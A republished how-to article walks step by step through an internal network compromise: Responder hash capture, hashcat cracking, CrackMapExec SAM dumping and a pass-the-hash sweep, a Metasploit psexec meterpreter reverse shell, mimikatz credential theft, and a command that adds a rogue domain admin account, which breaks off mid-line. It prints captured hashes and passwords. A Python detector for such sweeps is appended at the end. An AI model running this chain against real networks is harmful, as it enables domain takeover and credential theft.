Summary: obtaining domain controller permissions by probing a private network with Responder

2025-01-29 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--


(1) Run Responder to probe the private network (https://github.com/lgandx/Responder)

./Responder.py -I eth0 -rPv

(2) Obtain the response value from 172.16.157.133

(3) Use CrackMapExec to check the NetBIOS information of this host

cme smb 172.16.157.133

(4) Use hashcat to crack the response value

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

The recovered password is Winter2018!

(5) Scan with CME

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

(6) With a local administrator account, dump the local password hashes

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

(7) Obtain the NTLM hash value of the FRONTDESK password

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

(8) Use pass-the-hash to check SMB permissions across the local network

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth

(9) You can log in to the 172.16.157.134 server

(10) Check 172.16.157.134. The computer has domain control permissions.

cme smb 172.16.157.134

(11) Obtain a shell in msf using the SMB password

use exploit/windows/smb/psexec

set smbpass aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51

set smbuser administrator

set payload windows/x64/meterpreter/reverse_tcp

run

getuid

(12) Use mimikatz to obtain the domain control password

load mimikatz

kerberos

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda
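From the defender's side, the sweep in step (8) leaves a recognizable pattern in Windows Security event 4624: one source making NTLM network logons with the same local account name on many machines in a short time. The following is an added example, not part of the original article; the sample events, host names, source addresses and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(ts, host, user, domain, src, pkg="NTLM", ltype=3):
    """Build one constructed 4624 record, keyed by the event's field names."""
    return {"TimeCreated": datetime.fromisoformat(ts), "Computer": host,
            "TargetUserName": user, "TargetDomainName": domain,
            "IpAddress": src, "AuthenticationPackageName": pkg, "LogonType": ltype}

# Constructed sample events, not real logs; hosts and source IPs are made up.
SAMPLE = [
    ev("2025-01-29T10:00:01", "WS01", "administrator", "WS01", "172.16.157.50"),
    ev("2025-01-29T10:00:02", "WS02", "administrator", "WS02", "172.16.157.50"),
    ev("2025-01-29T10:00:04", "SRV03.corp.local", "administrator", "SRV03", "172.16.157.50"),
    # Domain account over Kerberos: ordinary access, must not alert.
    ev("2025-01-29T10:01:00", "SRV03.corp.local", "alice", "CORP", "172.16.157.20", pkg="Kerberos"),
    # One local-account NTLM logon from another source: below the threshold.
    ev("2025-01-29T10:02:00", "WS01", "FRONTDESK", "WS01", "172.16.157.21"),
]

def short(host):
    """The Computer field may be an FQDN; compare on the upper-cased short name."""
    return host.split(".")[0].upper()

def is_local_ntlm_network_logon(e):
    """Type 3 logon over NTLM with a local account (account domain == target host)."""
    return (e["LogonType"] == 3
            and e["AuthenticationPackageName"].upper() == "NTLM"
            and e["TargetDomainName"].upper() == short(e["Computer"]))

def find_sweeps(events, min_hosts=3, window=timedelta(minutes=5)):
    """Map (source_ip, account) -> hosts reached, for sources that used one
    local account name on at least min_hosts machines inside the window."""
    by_key = defaultdict(list)
    for e in filter(is_local_ntlm_network_logon, events):
        by_key[(e["IpAddress"], e["TargetUserName"].lower())].append(e)
    alerts = {}
    for key, evs in by_key.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1  # slide the window forward
            hosts = {short(e["Computer"]) for e in evs[start:end + 1]}
            if len(hosts) >= min_hosts:
                alerts.setdefault(key, set()).update(hosts)
    return {k: sorted(v) for k, v in alerts.items()}

if __name__ == "__main__":
    print(find_sweeps(SAMPLE))
```

Tune min_hosts and window to the environment; management servers that legitimately log on with local accounts will need an allowlist.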
